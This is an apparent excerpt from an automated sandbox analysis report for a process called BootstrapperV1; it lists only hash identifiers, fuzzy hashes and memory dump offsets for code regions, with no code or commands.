                                                      • Opcode ID: 7989a0dcc4f472c0dc7ccce4000184e28bd74da0eeb5b893243023bc9a8fe102
                                                      • Instruction ID: 51256ff64e421fb20986d0ea587cc9f3db0b2b936ece1f370fe792f0e211357f
                                                      • Opcode Fuzzy Hash: 7989a0dcc4f472c0dc7ccce4000184e28bd74da0eeb5b893243023bc9a8fe102
                                                      • Instruction Fuzzy Hash: 70217F30A19A4D8FDF94EF588495AEA7BE4FF29355F01013AE449D32A1CB389941C790
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 32afff16e5ad751354775821a29952c3ed31d4ebfde64361f8cdcbaf0cf79778
                                                      • Instruction ID: 133dae0aae453b5e446f356e2dde2a8b7870a7f80ad62c6c6fd1d7e6193080cf
                                                      • Opcode Fuzzy Hash: 32afff16e5ad751354775821a29952c3ed31d4ebfde64361f8cdcbaf0cf79778
                                                      • Instruction Fuzzy Hash: A921C121B19E4D0FEFA4EB6CC465AE837D1DFA8740B0541BAE44DCB2ABDD24EC418380
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 88fb39c5d0d0079d61a2ab8255719bfb3ceeef96698462a7d3897fb8992e96ee
                                                      • Instruction ID: 13d5e09c91e7f1fe736f0b1c06774e083792c4e5d82fdb2d2a9cf09c19fc75b7
                                                      • Opcode Fuzzy Hash: 88fb39c5d0d0079d61a2ab8255719bfb3ceeef96698462a7d3897fb8992e96ee
                                                      • Instruction Fuzzy Hash: 1511A022B1ED0E0FBAA8A65C60A46B563C2DBEC2A5715057AD85EC32A4ED19AD034350
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 94d686882f6416003d1037c86e7fe1675797735440061329395ed788a2e76ee1
                                                      • Instruction ID: 35caa09d7f4309788732b6d59d5f027b1d748c8bb4c99cab56b3ca7d2144a7a3
                                                      • Opcode Fuzzy Hash: 94d686882f6416003d1037c86e7fe1675797735440061329395ed788a2e76ee1
                                                      • Instruction Fuzzy Hash: 2E112532B0FD4D0FE6E44AAD3CA51A436C1EF9C65170601BBE88CC32B6DC069D428345
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 09edec3dd788909cb9ac7076cb20628cf847b46a141705b6a301c6402f00f687
                                                      • Instruction ID: 14d59f56afa12bf2079260bfce2cb4b73c20cc170e6196e149872b82ebc9ffa2
                                                      • Opcode Fuzzy Hash: 09edec3dd788909cb9ac7076cb20628cf847b46a141705b6a301c6402f00f687
                                                      • Instruction Fuzzy Hash: 3921C221A1F7C90FD76797748879A613FF1EF0620070A85EBC089CB1E7D918AC0AC352
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d2255c3852a083d838c94b7c34714d0689db914620d146e568afbbe51bbe6ef0
                                                      • Instruction ID: 425cb506b1412d8e2b595a3264afc980353fe9d907b6ea6774cb5fd0d606750f
                                                      • Opcode Fuzzy Hash: d2255c3852a083d838c94b7c34714d0689db914620d146e568afbbe51bbe6ef0
                                                      • Instruction Fuzzy Hash: D3118C21B1DD4D0FE7A8971C6864BF537D1EFDD250B0500BAD48CC72A2DD19BD028360
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4ea08a0b827e4b9ccb1c3a6d39b14cbd0a87d9b9cb722335237e7f501cf5d750
                                                      • Instruction ID: ff90f6722f5d27c7651266315b7a3e8573924853d974fbea0020361bbc3b786a
                                                      • Opcode Fuzzy Hash: 4ea08a0b827e4b9ccb1c3a6d39b14cbd0a87d9b9cb722335237e7f501cf5d750
                                                      • Instruction Fuzzy Hash: EC215734B1AA498FEBA4EB6CC090FB573D1EF98384F5545B9D08AC76A6CD24F941C740
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d3235042dd382c0e8de51bbe1432da9f2d8ccdd2daac569e8bd404d1364892fd
                                                      • Instruction ID: d24f878d5ac3b07951c479bff9936e442e058092ce11720d8625f3ebb54509df
                                                      • Opcode Fuzzy Hash: d3235042dd382c0e8de51bbe1432da9f2d8ccdd2daac569e8bd404d1364892fd
                                                      • Instruction Fuzzy Hash: D111C676B0FD4D0FE6E54AAD2CB51B426C1EF9C74170601BAD48CC32B6DC16AE018255
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 20808643d7e3de63a9bce856d2e2efd4c9c8029b62d6751f1ce9761e7ad0246f
                                                      • Instruction ID: eb3a817c24163cf761c48a97c6349ebf680a56d0d247c4e51b8ba71311b55929
                                                      • Opcode Fuzzy Hash: 20808643d7e3de63a9bce856d2e2efd4c9c8029b62d6751f1ce9761e7ad0246f
                                                      • Instruction Fuzzy Hash: DA11E131B0DA1A4BDB7895ADA4A46B537E1EB99320F11037FD01FC32F5DD28A9418384
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f99bc0a86bcd90f109b3dd5b25a9ebb6f78ac929965e6bbc215c54e66c9809e0
                                                      • Instruction ID: dc6db6a3f338b694e389fdc8e09cf4ad3d28a44511882f44791b13bf3058f44f
                                                      • Opcode Fuzzy Hash: f99bc0a86bcd90f109b3dd5b25a9ebb6f78ac929965e6bbc215c54e66c9809e0
                                                      • Instruction Fuzzy Hash: 90212B3021DF4A8FC766DB7CC064DA2B7D1EF5631071585EDD05AC72B2D929E885C710
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0d354f05acfe9f414b66bfc5c52f26acab1661b2f2c9d069edfc4e43cde1d555
                                                      • Instruction ID: d308742cf25e474419ccec0fe34adcfce0fdfef9864907c72461dad7f49d1f21
                                                      • Opcode Fuzzy Hash: 0d354f05acfe9f414b66bfc5c52f26acab1661b2f2c9d069edfc4e43cde1d555
                                                      • Instruction Fuzzy Hash: 17110821B2DF8E0FDB69EB1894A09B57BA1FFD531074646F7D04CCB1EADD28A8018380
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68fe556102e640ef1f023b4d8e8ae2e1676d51b0d2b4ae88ffa094be26ead97a
                                                      • Instruction ID: b16a4a63bbfed74ec99341cfd4616ac7cda8505e79c563c2b652c93889557386
                                                      • Opcode Fuzzy Hash: 68fe556102e640ef1f023b4d8e8ae2e1676d51b0d2b4ae88ffa094be26ead97a
                                                      • Instruction Fuzzy Hash: 4511E526B0FE890FE365AB6C28611F56BD1DF5A260B0A00ABD0C8C72E7DD1969468381
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d96a7850e0978462bd862f3259c27f9c04863861057e67d35517eaa5fde4c62d
                                                      • Instruction ID: 65b82541be30c0dc0698611db5f4977989eaae97b1d33b4b01f580fd0a32e420
                                                      • Opcode Fuzzy Hash: d96a7850e0978462bd862f3259c27f9c04863861057e67d35517eaa5fde4c62d
                                                      • Instruction Fuzzy Hash: 6F11E77060A78E6FE755CF7488256E63FE4EF4A220F0405BEE489C71E2C6685C96C791
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1dcf040902c96191485ede7996c2564d54a55516e9c8dcf4b70182ad9b893a58
                                                      • Instruction ID: 80cf2e54ad490b5b5311f089521ed89f01b2fe116da94ebc4648b84dc2d4c62f
                                                      • Opcode Fuzzy Hash: 1dcf040902c96191485ede7996c2564d54a55516e9c8dcf4b70182ad9b893a58
                                                      • Instruction Fuzzy Hash: 90016D31B1AA0D1FEAA4EA6CA8646663BC5EB99320F51027AE40CC72B6DD15AD0183C5
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 65dba4377e0f6c0bd3baab63fd040578d9b65812bc0ceea67f378ebcb093aba1
                                                      • Instruction ID: 13677751ad6571d0e188bec9d5bc1161ed67fe08cd943f0ea3ff55831c7fec51
                                                      • Opcode Fuzzy Hash: 65dba4377e0f6c0bd3baab63fd040578d9b65812bc0ceea67f378ebcb093aba1
                                                      • Instruction Fuzzy Hash: B301B521B2CE4F8BDBD8EB1894605F573D1FFD834074505BAD089C3299DE24E9414381
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3fab3a4b2b2bb9351aa77d2376a84f707d1528c302a5f4a7714c36c68e11c7dc
                                                      • Instruction ID: 75eccf39fbf8b2129d2f860ab34013272533d8f61853b87cbdffb3f36a1b7e09
                                                      • Opcode Fuzzy Hash: 3fab3a4b2b2bb9351aa77d2376a84f707d1528c302a5f4a7714c36c68e11c7dc
                                                      • Instruction Fuzzy Hash: B601D45160AA860FD761977C885C6607FD1DF5A22078903EAE0A8CB1E3D91458868351
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd771050aeb8aab4007802b1823f7d2cdcafebed2aee824259ebfb7b94542238
                                                      • Instruction ID: d1d72ef52cc3eabd3614aabd0e046389206547aa9c8f61c6388ea3b9aad92383
                                                      • Opcode Fuzzy Hash: dd771050aeb8aab4007802b1823f7d2cdcafebed2aee824259ebfb7b94542238
                                                      • Instruction Fuzzy Hash: EF01D601F1FB4E0FEB986B7C243567DB5C1EF99110B8515BAD40DC62BBEC099C414288
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 10d6342d818a42c611f76f69383d29780a06742d7cb9d4e9d7a5cb6136bf982f
                                                      • Instruction ID: 00e6bacc5d2c36878311fa5e2cb389c26307a54b4ebcfd652dbcb56624cdef89
                                                      • Opcode Fuzzy Hash: 10d6342d818a42c611f76f69383d29780a06742d7cb9d4e9d7a5cb6136bf982f
                                                      • Instruction Fuzzy Hash: 5401D621B28D4F8BDBECEB1C94609BAB3E2FFD834074505BAD04DC3289DE25E8424781
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a71a80e650de6395118182615236725db370f170c12c1e3a58d5dd3fc1551650
                                                      • Instruction ID: eac0f7374961d283641673bbe5dadc0bcd0cf16020912e382e182e19a51a7590
                                                      • Opcode Fuzzy Hash: a71a80e650de6395118182615236725db370f170c12c1e3a58d5dd3fc1551650
                                                      • Instruction Fuzzy Hash: 0401D820B0EE0A0FEB7895AD94A457977E1EF95330F11037EC01B871F5CD29A986C785
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e3b850f4b7d04a1403acb20ffc34878b077e31994aa18af791133a5c2bc445a1
                                                      • Instruction ID: 50d16a918efbc3f1b53da73363578f0b4ebff8b27fa94e57f3b342daf8e5f321
                                                      • Opcode Fuzzy Hash: e3b850f4b7d04a1403acb20ffc34878b077e31994aa18af791133a5c2bc445a1
                                                      • Instruction Fuzzy Hash: 4401B520B0EE1A4FEB7895AE947857977E1EF95330F11037EC05B871F5CD28A9828785
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ce42a5ad52581d32ebf9546e7428f220e8d102500d845118a720096273a2a02
                                                      • Instruction ID: 1f14e3f4d5a8091920b2a326b221e4c9379b87d5d6ecba57db82f9cf55b19869
                                                      • Opcode Fuzzy Hash: 3ce42a5ad52581d32ebf9546e7428f220e8d102500d845118a720096273a2a02
                                                      • Instruction Fuzzy Hash: 1B01D820B0DE1A0FDBB895AD94645B577E1DF95330F11037EC05BC71F5CD29A9828381
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e2c8a6f8210756d55c879c543315360567f151def7c5e1818d8cd02755413310
                                                      • Instruction ID: 61c8efee7cbaa2eb93e5f8926a7d25395c978213b20c5aff4d22c69023f23423
                                                      • Opcode Fuzzy Hash: e2c8a6f8210756d55c879c543315360567f151def7c5e1818d8cd02755413310
                                                      • Instruction Fuzzy Hash: 3901DB5271DE8A0FD799E77C60655E9A7D1EFA422070447F7C01DC729BDD2898828340
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27ff15068bda839bdb3a6562c3bad2810868ab995880676c01171c3357d4fd52
                                                      • Instruction ID: de9bf030ff3c1d3b355329ed556ff10edbe08ce16cfc561c1b8774579768b8d7
                                                      • Opcode Fuzzy Hash: 27ff15068bda839bdb3a6562c3bad2810868ab995880676c01171c3357d4fd52
                                                      • Instruction Fuzzy Hash: D301F931B05A4D8FDF85FBA884656FDBBE1EF59320B14027AC41ED72E2D92868808781
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8faad0a0f6e7b7b35ca80acd8aed84c288c496303ee7a8451ea6704309e551d3
                                                      • Instruction ID: e8e4685417acabde61fd024b4ac085cd3d0bfd3a8aea0f3c670b2135e07e241b
                                                      • Opcode Fuzzy Hash: 8faad0a0f6e7b7b35ca80acd8aed84c288c496303ee7a8451ea6704309e551d3
                                                      • Instruction Fuzzy Hash: A5F0C212B0E39D0BE2708A9C18655747BC1DF8616074B02BAC44DC72B2DC0D6A4142E5
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f10e3701072facc048325d61c0dbf7d477b599bb1b9d30172f3d07ca51a6fb3c
                                                      • Instruction ID: 678e7d7b9ea814c106d164a30708828260396df27e5e360be2e7d4a38758554a
                                                      • Opcode Fuzzy Hash: f10e3701072facc048325d61c0dbf7d477b599bb1b9d30172f3d07ca51a6fb3c
                                                      • Instruction Fuzzy Hash: 44F09C5670F98D1FE36692BD58A52F45B85DBDE26070E41F7D08CC71A3DC444D8A43A2
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e6217de51671ec5780cc563c0e0ec34af4195a91f1abb0708ced5d7000b9e4c
                                                      • Instruction ID: 0e6f6ed6676ad40599859fe2ea0b9290491b1b21cd548a82e0f94d6c651c006d
                                                      • Opcode Fuzzy Hash: 9e6217de51671ec5780cc563c0e0ec34af4195a91f1abb0708ced5d7000b9e4c
                                                      • Instruction Fuzzy Hash: 60016D44A5F7CA1ED76363B81C301A53FA49F4B12470A02E7D4C8CB0FBE80C5A56C39A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f347a203c19ad7514ac9d4a5651204fa79abdbe5789fc4a8c559fef83f2fabcd
                                                      • Instruction ID: 6716ecb1ab6e8dd1b6a204200b7e0ef9c447c4be1c56d9bc25262da4ab6942ac
                                                      • Opcode Fuzzy Hash: f347a203c19ad7514ac9d4a5651204fa79abdbe5789fc4a8c559fef83f2fabcd
                                                      • Instruction Fuzzy Hash: CE010C3170DA098FE7A8DA68C065BA57BE1FF44300F1146BDD0ABC76B2DA24B941C794
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 64c560736e4932fe20c877e255559ca4cf90a0c39725598513fc294fce91a9ef
                                                      • Instruction ID: 6d9090bc0deadca93afe50128cdabe38f359def84abdbc72e1e67db14e7e1be0
                                                      • Opcode Fuzzy Hash: 64c560736e4932fe20c877e255559ca4cf90a0c39725598513fc294fce91a9ef
                                                      • Instruction Fuzzy Hash: CAF09671B5DB454AD30C9F08B4428B9B3D0EBC5328F5005AFE09E4269BDE36A547868B
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b2eba5c477d20d42250b8abbac20ba0f30a16c80fe6c2ec15daf80d28d48382d
                                                      • Instruction ID: 2b7713023284824f9ad3bcd51bc61d884aae2d492895bc8f8bc00ed7e79f811b
                                                      • Opcode Fuzzy Hash: b2eba5c477d20d42250b8abbac20ba0f30a16c80fe6c2ec15daf80d28d48382d
                                                      • Instruction Fuzzy Hash: 6DF0E93170A80F0EE674928DA4697F176C8EF9D3B0F1600B6E5CDC31A2EC489D428240
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4e9cb55ada52be0b393ebf0fda6279cc854f983da58427afc811c05a4d734a79
                                                      • Instruction ID: ecaaecff543af40ead5e2e0b0b5720b444f77605c661880caf358c2b47e80c37
                                                      • Opcode Fuzzy Hash: 4e9cb55ada52be0b393ebf0fda6279cc854f983da58427afc811c05a4d734a79
                                                      • Instruction Fuzzy Hash: FDF05E42F0FBDE1FD6A6526C18601A42E92ABA955074E02A6C488C72F7DC4C5D4683E5
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 38c87c5db8b488a26e6a931505d765a689d151fb32ecd25cb5fb450a22b56887
                                                      • Instruction ID: dee9a23b3294a865a84a307ef750ec58bbf327970f3d847d1aae2f3c1e64ba54
                                                      • Opcode Fuzzy Hash: 38c87c5db8b488a26e6a931505d765a689d151fb32ecd25cb5fb450a22b56887
                                                      • Instruction Fuzzy Hash: E5F0A910F1EB1E15FAB456A854303B97D82AF84714F4603B8D41D872F1DE1C6B86C3C9
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ca03e54c5e0349b11e7b110acb6b1b89518c30f355b3af6f275c037a3fcf442
                                                      • Instruction ID: 27a738e33375b9c7a7f0843186daf21d93875be7798caea1d4d919f750fb716d
                                                      • Opcode Fuzzy Hash: 3ca03e54c5e0349b11e7b110acb6b1b89518c30f355b3af6f275c037a3fcf442
                                                      • Instruction Fuzzy Hash: 06F0DA71A2CB488B9B54AE4CAC434AD77D0EB99B60F10116BF94943211D621B9928AC7
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14d4f8cb31a91ae24abdf97318850b34e77696822c7c1742dcd9165a18613079
                                                      • Instruction ID: 72ad7a0e1f2597a42d33a9dff1b868de5efef4f775505fdead58c715228d094b
                                                      • Opcode Fuzzy Hash: 14d4f8cb31a91ae24abdf97318850b34e77696822c7c1742dcd9165a18613079
                                                      • Instruction Fuzzy Hash: 01F0A77271EA1E0FE558BA0C24521B873D2DB8D660714417FD48FC32A7EC2569074385
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ec282952493cf7d26512362d4841d101ebfb64ef4f59dfdda433eb3b6b9c2b22
                                                      • Instruction ID: e494ba798eb8fed42b12146d57d5a4e868f7574fc6ab863cd329ccd1aebcfb71
                                                      • Opcode Fuzzy Hash: ec282952493cf7d26512362d4841d101ebfb64ef4f59dfdda433eb3b6b9c2b22
                                                      • Instruction Fuzzy Hash: 3B01A22070E2860FE3665AF495757A57AD09F82330F1905BED006CB1F3CD9D1C818256
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
